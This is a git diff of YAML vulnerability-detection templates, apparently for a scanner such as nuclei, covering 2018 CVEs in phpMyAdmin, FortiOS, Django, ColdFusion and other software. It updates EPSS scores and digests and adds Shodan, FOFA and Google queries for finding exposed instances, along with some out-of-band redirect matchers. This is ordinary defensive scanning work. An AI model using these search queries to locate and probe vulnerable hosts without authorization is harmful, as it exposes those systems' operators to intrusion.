-# digest: 4a0a00473045022100b3dfe85d30990abdfc76926f79fc0972052a3bf24374013a6ed622a5fac500f402202ad50a628af7526e0eca73ed3a88133d9c9e4962c830fcc5b7e868563bedb40e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009dfce0d02b5695b72b5abb8cf9079405d12ade3adcfc1c5bb25e4b725d8926ee02202fa0abf4ea932a109e72c5a67f552de24aa8c6fe91c634debed351d5be5d2e64:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml
index 5a32b4c999..359bdefacf 100644
--- a/http/cves/2018/CVE-2018-12613.yaml
+++ b/http/cves/2018/CVE-2018-12613.yaml
@@ -20,13 +20,17 @@ info:
cvss-score: 8.8
cve-id: CVE-2018-12613
cwe-id: CWE-287
- epss-score: 0.97392
- epss-percentile: 0.99908
+ epss-score: 0.97369
+ epss-percentile: 0.99902
cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: phpmyadmin
product: phpmyadmin
+ shodan-query: http.title:"phpmyadmin"
+ fofa-query: title="phpmyadmin"
+ google-query: intitle:"phpmyadmin"
+ hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4"
tags: cve,cve2018,vulhub,edb,phpmyadmin,lfi
http:
@@ -44,4 +48,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450221009efa0514463053230c63b5f90705314d9e80a1a472ea48bb9da85b5c9779ee6402206c0ec7976f0ef1416debde9235f1b2a274324bd6782667980cd9288d6c90b06b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009b44e1f59ab1d35b1079bbeecba8fabbcc3d662db03dd9feebe186ea1526671f022100c1cd55fbb8aae22f862d0894cf82b08ecdbd72d84263a165885987f10d83a5c8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml
index d6edb3744c..0c32cd9593 100644
--- a/http/cves/2018/CVE-2018-12634.yaml
+++ b/http/cves/2018/CVE-2018-12634.yaml
@@ -20,8 +20,8 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-12634
cwe-id: CWE-200
- epss-score: 0.95531
- epss-percentile: 0.99245
+ epss-score: 0.94448
+ epss-percentile: 0.99209
cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -51,4 +51,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100ed0b29ad551cb1c8046e44ccfeb468882574d4d84131408c68bd1df5afd26cfa022075bd7e7320c9c33dad093dd40822990e12fc84791e76510619255948ce4ba1cd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022070d438b8deca8262b388a1ac84d7a28612a28f7eb0ec72da39762e02a9ab2c6e02205bdbf452ac32f90703c55fbb539c9a91679e39359fcbaf302d82948f56a6b57b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml
index 52e4353249..7c9a0a106d 100644
--- a/http/cves/2018/CVE-2018-12675.yaml
+++ b/http/cves/2018/CVE-2018-12675.yaml
@@ -22,7 +22,7 @@ info:
cve-id: CVE-2018-12675
cwe-id: CWE-601
epss-score: 0.00118
- epss-percentile: 0.44971
+ epss-percentile: 0.45948
cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:*
metadata:
verified: true
@@ -41,4 +41,4 @@ http:
part: body
words:
- ''
-# digest: 4a0a00473045022100fe1e9de738122538a2449b660acfbadd5b2f6e95f978b4fd052467bb4f222c1b022077728b007829328b0aa238c9635a5106d04c04ef695ec1557e91b4b5b46cb70f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f687e998ebd40e7f6e0cd7750ccdc2f8cd832181f93aa0404dd46ea313b3754502200c2cbb0e94b7ac91d20cd6904518d07f26788a7f5ba5f1318552e687577c3e37:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml
index 0842786335..82fa5984d6 100644
--- a/http/cves/2018/CVE-2018-1271.yaml
+++ b/http/cves/2018/CVE-2018-1271.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2018-1271
cwe-id: CWE-22
epss-score: 0.004
- epss-percentile: 0.73113
+ epss-percentile: 0.73504
cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*
metadata:
max-request: 2
@@ -44,4 +44,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022029c3380bdfd5118230de31f228fa1f4e5f2888d9bd277fe8ac5d3a84562a79f5022036b5eb64e2ed0675f3fc8179c9692ed6a466c35c7e8f0af65d4256edaec216c9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f8dc70bf72aa6d2c7fbe2e2c55aff27c85410de59599fde3c1e37aa7ca9e354202206242c50d362c74213733b6b42877aadf4cc58cbb8aaf1d5b615b051ca566a2a5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml
index ec75f3047f..7ccfefb35a 100644
--- a/http/cves/2018/CVE-2018-1335.yaml
+++ b/http/cves/2018/CVE-2018-1335.yaml
@@ -18,8 +18,8 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2018-1335
- epss-score: 0.96734
- epss-percentile: 0.99585
+ epss-score: 0.96745
+ epss-percentile: 0.99664
cpe: cpe:2.3:a:apache:tika:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -58,4 +58,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100995e04bbc6df48317be210a749a2ac8a731b0e7bfa4d547e026075349e5190cc022100d0c88986a6df82ebc03e665d29d294e7d0ba57cdb72c09407727cee0689e6c0a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202e147e540018e89eb8892a229a98bbab99feca5c6f1416e246e0264aa28dd539022100c3f35f328d7fc8c2c5141f428a2585389f9262293b5bccb23bd929c7798c2374:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml
index 0cb4384d6f..cf3a399d3d 100644
--- a/http/cves/2018/CVE-2018-13379.yaml
+++ b/http/cves/2018/CVE-2018-13379.yaml
@@ -27,6 +27,7 @@ info:
vendor: fortinet
product: fortios
shodan-query: http.html:"/remote/login" "xxxxxxxx"
+ fofa-query: body="/remote/login" "xxxxxxxx"
tags: cve2018,cve,fortios,lfi,kev,fortinet
http:
@@ -39,4 +40,4 @@ http:
part: body
regex:
- '^var fgt_lang ='
-# digest: 4b0a00483046022100ed688fb687003137454ccb27e917dd0a47b6effc89bb9404707395186fce0efd0221008586aa2b87390aed0dd185af0e8a536f991a73de918ddcad55a7bc3acfdbc0fe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220259917bb43137924f23094b16480365fa1e3839c5fca4713af8f2f63008f58d202210082449a7709741b6ff30609ecff6d86e847e2517c01cba5c4694973ee94fa9ca5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml
index be4ef26f42..1f6241640e 100644
--- a/http/cves/2018/CVE-2018-13380.yaml
+++ b/http/cves/2018/CVE-2018-13380.yaml
@@ -21,12 +21,14 @@ info:
cve-id: CVE-2018-13380
cwe-id: CWE-79
epss-score: 0.00122
- epss-percentile: 0.46406
+ epss-percentile: 0.46539
cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: fortinet
product: fortios
+ shodan-query: http.html:"/remote/login" "xxxxxxxx"
+ fofa-query: body="/remote/login" "xxxxxxxx"
tags: cve,cve2018,fortios,xss,fortinet
http:
@@ -53,4 +55,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502206ce45dc62265ae4f6192bec17dcdd2579840de84d6a70b1d94b162f3c44d36300221009e122123ca302b8c7791dae1933312958f9d3f1e0e89daf77aaa2b2dd224bd2f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210082af42871fa237fbd8e44fca7400eefd815f0228679b14a47eef8e58bf9bd2c30220677acd9c0f102308eef360373ba7b6611d2e1c1a2d5a909ed06667e3a9812e01:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml
index cbd950e35d..413e751f73 100644
--- a/http/cves/2018/CVE-2018-13980.yaml
+++ b/http/cves/2018/CVE-2018-13980.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2018-13980
cwe-id: CWE-22
epss-score: 0.0018
- epss-percentile: 0.5428
+ epss-percentile: 0.55107
cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220228e9d192f56704740750f3a51ad746dcfc7ca200431ce286c6b232e1803320e022100e58e67a71cef0a53f5d448ad997bd96cc2c3380c4a78a356c1af321cd3367885:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203224fda196eb1cbc81b68a79d58afaed6d9d7d9c8821fbcc463a6bc0e7295ad4022059cbe8295c4346847a37bf4a6db45ed614ead696931c35f803ddd046ee3c3c17:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml
index f6a55e3a22..d80782ef1c 100644
--- a/http/cves/2018/CVE-2018-14013.yaml
+++ b/http/cves/2018/CVE-2018-14013.yaml
@@ -20,13 +20,16 @@ info:
cvss-score: 6.1
cve-id: CVE-2018-14013
cwe-id: CWE-79
- epss-score: 0.00755
- epss-percentile: 0.80655
+ epss-score: 0.0065
+ epss-percentile: 0.7936
cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: synacor
product: zimbra_collaboration_suite
+ shodan-query: http.title:"zimbra collaboration suite"
+ fofa-query: title="zimbra web client sign in"
+ google-query: intitle:"zimbra collaboration suite"
tags: cve,cve2018,xss,zimbra,synacor
http:
@@ -49,4 +52,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402206f46ca25bae61a8c58a2d3c73103864b52d0333002e1c2422e184eef65e1321b022070c5d6a65e7a9734927fdd6fed6fedc1651f044f5268dd3a44c0d7550fb33f82:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210090246985aa33f0e41c9ed59146b95be1f9cdf7ab26257777ce98c063ed12309c02202b81c53a22187906b5e2321ac991e64fe0ee52372aee7f041ea1d9de847edb66:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml
index bf166bf6af..6f1620e74e 100644
--- a/http/cves/2018/CVE-2018-14474.yaml
+++ b/http/cves/2018/CVE-2018-14474.yaml
@@ -15,13 +15,14 @@ info:
- https://seclists.org/fulldisclosure/2019/Jan/32
- https://vuldb.com/?id.122045
- https://nvd.nist.gov/vuln/detail/CVE-2018-14474
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-14474
cwe-id: CWE-601
- epss-score: 0.00068
- epss-percentile: 0.28116
+ epss-score: 0.00063
+ epss-percentile: 0.26641
cpe: cpe:2.3:a:goodoldweb:orange_forum:1.4.0:*:*:*:*:*:*:*
metadata:
max-request: 2
@@ -41,4 +42,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4b0a00483046022100f2adff2da944fbe9a1b29f662efd016ead45875d2e06992cd9e61e573f5877f4022100d08b0890924b7addb0673fc531f213922f2e4e23760f5dbca533566a40845382:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203794f97eb985e7b51a642cd485979e762edf2fa8b530829012c75ba4e3091830022100a2ffa6b6686a57dc714d016096bfc2ae7990e9e9d11a3514fa51cd92a05fe911:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml
index 4039ad5d78..8bde4688f3 100644
--- a/http/cves/2018/CVE-2018-14574.yaml
+++ b/http/cves/2018/CVE-2018-14574.yaml
@@ -21,13 +21,14 @@ info:
cvss-score: 6.1
cve-id: CVE-2018-14574
cwe-id: CWE-601
- epss-score: 0.00828
- epss-percentile: 0.80126
+ epss-score: 0.00628
+ epss-percentile: 0.78964
cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: djangoproject
product: django
+ shodan-query: cpe:"cpe:2.3:a:djangoproject:django"
tags: cve,cve2018,django,redirect,djangoproject
http:
@@ -46,4 +47,4 @@ http:
- type: status
status:
- 301
-# digest: 4b0a004830460221009caa5018de3f67f939a8bcb172921b8986a43ff83a2c7628413233ec2433c2af0221009d8028df2af32e3128aa06fe627e6d4c10fe49894f9539685a34e7f1a00e83ca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100bedaae748e6aaf48b9c690e95cc9f56486416f4d42f946b7db3201185738e9b8022100f1b531a7f5d0c01c6c14cb2238b20ca9ec8bb63947c1bef07d0adcd8f59cc6f5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml
index 78b9b928bb..cddf9426d8 100644
--- a/http/cves/2018/CVE-2018-14912.yaml
+++ b/http/cves/2018/CVE-2018-14912.yaml
@@ -25,6 +25,9 @@ info:
max-request: 1
vendor: cgit_project
product: cgit
+ shodan-query: http.title:"git repository browser"
+ fofa-query: title="git repository browser"
+ google-query: intitle:"git repository browser"
tags: cve,cve2018,cgit,lfi,cgit_project
http:
@@ -41,4 +44,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100d6532de8059fab7fd78681f2120fb2a87cd3cb86792239d399ddefff43a1c3ac022100fcebf55316c2ace6c35b49754ffeb2a9ebe30f47a7b5437981e19da9b5545f82:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009214b35bc48d118e49903f07e951d276886bb2e963f35ada6608986e8379df6602202b9b26b182e0feccd8855c0eeeefbd4e71305d040621695262cf1b5336fe9b04:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml
index d18230ef1a..30e32db710 100644
--- a/http/cves/2018/CVE-2018-14916.yaml
+++ b/http/cves/2018/CVE-2018-14916.yaml
@@ -20,13 +20,13 @@ info:
cvss-score: 9.1
cve-id: CVE-2018-14916
cwe-id: CWE-732
- epss-score: 0.00685
- epss-percentile: 0.79617
- cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:*
+ epss-score: 0.00644
+ epss-percentile: 0.79217
+ cpe: cpe:2.3:h:loytec:lgate-902:-:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: loytec
- product: lgate-902_firmware
+ product: lgate-902
tags: cve2018,cve,loytec,lfi,packetstorm,seclists,xss
http:
@@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022043b6d593685732c05b518667af8e2a87711364d9dba4b0f64504a93eae54f2d9022100c5bf2364a2dd3724e40859f816ee1840a3245ed1a33f2273abf587916684486e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201431da7cb7d0c6f1cc9fe645c0cb50a7fd2bd61e9bf77564ef03316199d1e4f6022100f8c96bfcbbe4073e99071df37061329f4acf9403c04049f844f8d7c713c2ab0b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml
index 882b57bf37..02090d2feb 100644
--- a/http/cves/2018/CVE-2018-14918.yaml
+++ b/http/cves/2018/CVE-2018-14918.yaml
@@ -21,8 +21,8 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-14918
cwe-id: CWE-22
- epss-score: 0.44897
- epss-percentile: 0.97077
+ epss-score: 0.43288
+ epss-percentile: 0.97355
cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
@@ -30,6 +30,7 @@ info:
vendor: loytec
product: lgate-902_firmware
shodan-query: http.html:"LGATE-902"
+ fofa-query: body="lgate-902"
tags: cve,cve2018,loytec,lfi,seclists,packetstorm,lgate,xss
http:
@@ -47,4 +48,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402204ea28cd5779d252530f7f2854d3fec0aff9d51c4a5018f72ded4673441416d97022023e6c65fcf320c34b9df8210e07125951e511ab0661c65c758241634aa5c6b8c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ac853014f271b944b9ee20135ae63f4f05560df732d9ffb2d4a315c1298854da02202669480469ad9fa8caf3ecac955cda21d510d1dabc69069dd5fbc3ff497533b1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml
index 0276a7408c..ebb1b7959d 100644
--- a/http/cves/2018/CVE-2018-14931.yaml
+++ b/http/cves/2018/CVE-2018-14931.yaml
@@ -19,7 +19,7 @@ info:
cve-id: CVE-2018-14931
cwe-id: CWE-601
epss-score: 0.00118
- epss-percentile: 0.44971
+ epss-percentile: 0.45948
cpe: cpe:2.3:a:polarisft:intellect_core_banking:9.7.1:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -37,4 +37,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 490a0046304402201be780a4469ea0a8738f8438126c71d69f8d31d05d6839b39986254edf0db41402207b1a3a25c0738e82ca020983b3a8445e0463f65171558f9d5011fdcafecd6853:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008f0f25f2551f0a387e62f98821d148b071d8feeb62c016ee0a73491fbef4b47c02210083dd29779ff7f5309807d128bb88de8a1a1aa9ca767c5b36f90a3313fc9bb651:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml
index 0c8c87aa62..6e42b8366e 100644
--- a/http/cves/2018/CVE-2018-15517.yaml
+++ b/http/cves/2018/CVE-2018-15517.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2018-15517
cwe-id: CWE-918
epss-score: 0.01001
- epss-percentile: 0.83284
+ epss-percentile: 0.83597
cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:*
metadata:
max-request: 1
@@ -39,4 +39,4 @@ http:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
-# digest: 4b0a00483046022100b339ad6df9268d6b897b9c6b3faae2d6ea097baf206beafbf09c0a0f1c14b0d40221009cac5ad6cdb667b20025da67357b1151ebce73e32b71995292f1d60d7a43e50e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e26f46ac8fa0fbf78f910c608f41335ab410d944ba39bd21b4a25bf3f366b2c70221008bcd07b274e596cc4f0004c5167e46e1e2955692de90e4d0356634f1390bb2b5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml
index 792ee61d48..1d233eb624 100644
--- a/http/cves/2018/CVE-2018-15535.yaml
+++ b/http/cves/2018/CVE-2018-15535.yaml
@@ -14,13 +14,14 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2018-15535
- http://seclists.org/fulldisclosure/2018/Aug/34
- https://www.exploit-db.com/exploits/45271/
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-15535
cwe-id: CWE-22
- epss-score: 0.97149
- epss-percentile: 0.9976
+ epss-score: 0.9704
+ epss-percentile: 0.99756
cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402203c4ddbcd4e1d9a14a467c108e82ff87b32ec9351cb237830dd61e9ade6527fd0022040b2a10a4d6e4ce8557f04d663b75210e2f1e9ff391b65f66608c885c794c323:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fc45ca6bc462dfa12f3816a1d91516eb665c5c4890cbdc399651e65cb9d55488022100bc6fa04ba3a8224f267355833878b5b57b1da1a0cc82659bf3019b7aa6bd7c80:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml
index 42be838d22..f2a35a1f74 100644
--- a/http/cves/2018/CVE-2018-15745.yaml
+++ b/http/cves/2018/CVE-2018-15745.yaml
@@ -21,13 +21,16 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-15745
cwe-id: CWE-22
- epss-score: 0.94576
- epss-percentile: 0.99184
+ epss-score: 0.92562
+ epss-percentile: 0.98989
cpe: cpe:2.3:a:argussurveillance:dvr:4.0.0.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: argussurveillance
product: dvr
+ shodan-query: http.title:"web viewer for samsung dvr"
+ fofa-query: title="web viewer for samsung dvr"
+ google-query: intitle:"web viewer for samsung dvr"
tags: cve,cve2018,packetstorm,edb,argussurveillance,lfi,dvr
http:
@@ -47,4 +50,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100dc9985c42c6ada43064e760b5d0e9e7c91e0c13be081b6667a4578d416a3f8ac022100b49638b1fa7561d27698d6962f89f45384b44df899a37f6e01d94674e4651cd0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009ca9821ca84e3035987df97624dd5b8883b8c4849fc29b8142652e4e7d0080610220312c12edb16e29c072a827155cdebc39f586b5d5c69b398cb846e2c7d93792da:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml
index 507df95ba1..1db18b2221 100644
--- a/http/cves/2018/CVE-2018-15917.yaml
+++ b/http/cves/2018/CVE-2018-15917.yaml
@@ -18,8 +18,8 @@ info:
cvss-score: 5.4
cve-id: CVE-2018-15917
cwe-id: CWE-79
- epss-score: 0.04217
- epss-percentile: 0.92046
+ epss-score: 0.02648
+ epss-percentile: 0.90369
cpe: cpe:2.3:a:jorani_project:jorani:0.6.5:*:*:*:*:*:*:*
metadata:
verified: true
@@ -27,6 +27,7 @@ info:
vendor: jorani_project
product: jorani
shodan-query: title:"Login - Jorani"
+ fofa-query: icon_hash=-2032163853
tags: cve,cve2018,jorani,xss,jorani_project
http:
@@ -55,4 +56,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022032c0d3a3e6d2ec456254c10a587dc9efa108903eec34e0f3e026c6d76ef4d65602201978070aa018f55066f9722f3e9f66834c105641573a6528eeb51a9ee6e03480:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203412aba03e7df739713f759fcb37bef1eea1d3999931083f45827e66691d050f022100bfeb476846fd53627a129ee79b9bb245ee5f7a9c8fa80b019225676c03b850b1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml
index 799a2e2293..e9bddd04e4 100644
--- a/http/cves/2018/CVE-2018-15961.yaml
+++ b/http/cves/2018/CVE-2018-15961.yaml
@@ -20,14 +20,16 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-15961
cwe-id: CWE-434
- epss-score: 0.97411
- epss-percentile: 0.99921
+ epss-score: 0.97436
+ epss-percentile: 0.99942
cpe: cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:*
metadata:
max-request: 2
vendor: adobe
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
+ fofa-query: title="coldfusion administrator login"
+ google-query: intitle:"coldfusion administrator login"
tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive
http:
@@ -76,4 +78,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022079a0f0e0bdc7376e1343de468e02f8dd25505916ea291f52a4b4672bb49f58c6022045414437bbe18a49102cd5f18a1434331c158de4796d2340acbe64d8b9f82767:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206c705261b07bb3b5134ebe70f694bcf5598515f94687a58001eccb1f58fb9e6002206cc7bf1c42677820f7b501bd2aeed96acae06ab3780e0481a51780a3a7e97c7c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml
index bcc16fdd8f..b01dcb1143 100644
--- a/http/cves/2018/CVE-2018-16139.yaml
+++ b/http/cves/2018/CVE-2018-16139.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2018-16139
cwe-id: CWE-79
epss-score: 0.00135
- epss-percentile: 0.47838
+ epss-percentile: 0.48718
cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:*
metadata:
verified: true
@@ -29,6 +29,8 @@ info:
vendor: bibliosoft
product: bibliopac
shodan-query: title:"Bibliopac"
+ fofa-query: title="bibliopac"
+ google-query: intitle:"bibliopac"
tags: cve,cve2018,xss,bibliopac,bibliosoft
http:
@@ -51,4 +53,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022033723090a9b4a81b792ed6ecdaf230faf72fd66022ed67fae3697f90eff3b012022043a029915f1b514beac428b24c0629be457217dbe22ec11838076265cb09e9a5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200ed92c577723c47cb124f92446376127d6b6b6fcd2f6431bbbfe68e31a967e7b022017675d53de48db41cb32b1ba9e129efe88f22de8ef6b0bc3627c9470229ff9cb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml
index 5880a66046..417ee6ca3a 100644
--- a/http/cves/2018/CVE-2018-16159.yaml
+++ b/http/cves/2018/CVE-2018-16159.yaml
@@ -29,6 +29,8 @@ info:
vendor: codemenschen
product: gift_vouchers
framework: wordpress
+ fofa-query: body="/wp-content/plugins/gift-voucher/"
+ shodan-query: http.html:"/wp-content/plugins/gift-voucher/"
tags: cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen
http:
@@ -49,4 +51,4 @@ http:
- 'contains(content_type, "application/json")'
- 'contains(body, "images") && contains(body, "title")'
condition: and
-# digest: 4a0a0047304502202b1aa5555d71a8aca48bc022946bcdce1d30c66d55e0d3674a071d4f71c612ee022100956080f91d3386d400a3993d774251f5a2649171c661633597a767552865238a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204299459be2a55a288065e032b7726f84a36e94e06623cdc89bc6cbfe1f06f73402201a6086d0a7faeced068ec0dd8aa934238754b35510074d06c3671d2b5e93f945:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml
index 29cd045b1a..72474e0253 100644
--- a/http/cves/2018/CVE-2018-16167.yaml
+++ b/http/cves/2018/CVE-2018-16167.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2018-16167
cwe-id: CWE-78
epss-score: 0.27457
- epss-percentile: 0.9669
+ epss-percentile: 0.96794
cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -44,4 +44,4 @@ http:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- http
-# digest: 490a004630440220391e666a4ba5604bb62fcd1ca7396a502fb6f43913e9cd3c14529faf765f1464022047bf7f2d790f04727bd7e93e901f9af13a8077b286023e0a843688319ccf9df5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
